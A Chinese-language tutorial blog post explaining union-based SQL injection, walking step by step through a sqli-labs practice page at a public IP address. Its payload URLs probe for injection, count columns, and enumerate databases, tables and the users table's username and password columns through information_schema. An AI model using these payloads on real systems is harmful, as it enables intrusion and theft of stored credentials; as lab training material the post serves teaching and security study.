SQL注入原理剖析

渗透攻击红队

发布于 2019-11-19 14:57:06

8980

发布于 2019-11-19 14:57:06

文章被收录于专栏：漏洞知识库漏洞知识库

SQL注入原理剖析

SQL注入流程

SQL注入流程：
1、判断是否有注入（判断是否为严格校验）
2、什么类型的SQL注入
3、语句是否能够被恶意修改
4、是否能够成功被带入执行
5、获取我们想要的数据

获取数据库 -> 获取表 -> 获取字段 -> 获取字段内容

判断是否有注入

注入点 : http://43.247.91.228:84/Less-2/?id=1

常见的有：
	第一种：and
	and 1=1	  返回正常	
	and 1=2	  返回错误
  
    第二种：.0 、 .1
    ?id=3.0   返回正常
    ?id=3.1	  返回错误
    
    第三种：' (单引号)
    ?id=3'	  加单引号报错
    
    第四种：-1
    ?id=3-1   会返回 ?id=2 这个页面

正常页面：

and 1=1 返回正常：

and 1=2 返回错误

’ 加单引号返回错误显示

判断后，存在SQL注入！

获取数据

在 MySQL 中，有一个很重要的数据库：information_schema，而它有三个很重要的表

第一个表个是：SCHEMATA ： information_schema ，而这个数据库中的 SCHEMATA 表中的 SCHEMA_NAME 列中的值有我们的所有的数据库名

information_schema：第二个表是：TABLES TABLES 这个表里的包含了数据库中所有的字段

information_schema：第三个表是：COLUMNS COUMNS 这个表里的包含了数据库中所有的表

查询想要的数据

使用 union 查询是否有 4 列， %23 是 # 号的 URL 编码，是注释的意思（列数一样就不报错，列数不一样就报错） http://43.247.91.228:84/Less-2/?id=2 union select 1,2,3,4 %23

这边是报错了，显示：The used SELECT statements have a different number of columns （查询的内容前后的列数不一致）说明不是 4 列

使用 union 查询是否有 3 列， %23 是 # 号的 URL 编码，是注释的意思（因为刚刚判断是否有4列出错了，那么就往前减少一位数字判断） http://43.247.91.228:84/Less-2/?id=2 union select 1,2,3 %23

这边是显示正常，说明是 3 列

这里有个疑问，这个 1,2,3 是什么意思呢？ 1,2,3，是一个占位的意思。它的意思就是判断前面的列数有几列，一个逗号分隔的就是一列写其他的也可以，例如：66,777,8888

这个时候就可以在 1,2,3 占位符里使用 SQL 语句来查询了！因为有 union 查询，是查询前面和后面联合起来查询的，假如直接在列里插入 user（） //查询当前数据库用户名，不会显示

这是为什么呢？因为左边的 http://43.247.91.228:84/Less-2/?id=2 是一条查询语句右边的 select 1,user(),3 %23 没有任何条件也可以查询出来合并起来就是两条数据，但是呢它在显示数据的时候，默认只显示它的第一个数据，就是左边的数据，右边的数据有也不显示这个时候我们就可以让左边的数据没有，就可以显示出了：

-2 是没有的，然后就可以构造语句： http://43.247.91.228:84/Less-2/?id=-2 union select 1,user(),3 %23 这个时候就查询出当前数据库用户名是 root

查询 information_schema 数据库中的 schemata 表里的 schema_name 字段 http://43.247.91.228:84/Less-2/?id=-2 union select 1,schema_name,3 from information_schema.schemata %23

详解： information_schema.schemata 查询 information_schema 数据库下的 schemata 表 schema_name 这个就是 schemata 表里的字段下面是数据库的结构：

这边只查询出一条数据，查询出来后会显示第一个的字段内容：information_schema

想要查询所有的呢，就可以使用一个函数：group_concat() 吧所有的列的数据都显示，以逗号分隔

http://43.247.91.228:84/Less-2/?id=-2 union select 1,group_concat(schema_name),3 from information_schema.schemata %23

详解： group_concat(schema_name) 这个是用 group_concat 函数查询 schema_name 字段中的所有数据，并以逗号显示出来

这样就查询出了所有的数据库：information_schema,challenges,hacker,mysql,security,sql,test

查询当前所使用的数据库名

使用 database() 查询当前数据库名：

http://43.247.91.228:84/Less-2/?id=-2 union select 1,database(),3 from information_schema.schemata %23 database() 是SQL语句中查询当前数据库名的函数这边查询出来，当前所使用的数据库名是：security

知道了当前所使用的数据库是 security 后，我们需要查询数据库下有那些表：（所有的） http://43.247.91.228:84/Less-2/?id=-2 union select 1,group_concat(table_name),3 from information_schema.tables %23

详解： information_schema.tables 查询 information_schema 数据库下的 tables 的内容 group_concat(table_name) 使用 group_concat() 函数来显示出 table_name 列中的所有字段内容

上面的列出了所有的表了，但是我们想获取当前数据库下的表： http://43.247.91.228:84/Less-2/?id=-2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = database() %23

详解： information_schema.tables 查询 information_schema 数据库下的 tables 表 where table_schema = database() 使用 where 来指出只查询 table_schema 字段里当前所使用的数据库里的表（这个是一个条件语句） database() 是一个函数，查看当前数据库名

现在我们知道了，当前所使用的数据库中有四张表：mails,referers,uagents,users 一般 users 里会保存账号密码

查询 users 表里的字段： http://43.247.91.228:84/Less-2/?id=-2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema = database() and table_name='users' #

详解： information_schema.columns 查询 information_schema 数据库下的 columns 表 where table_schema = database() 使用 where 来指出只查询 table_schema 字段里当前所使用的数据库里的表（这个是一个条件语句） and table_name=’users’ and 条件语句来指出查询 table_name 表里的 ‘users’ 字段

这里就查询出了 users 表下的字段：id,username,password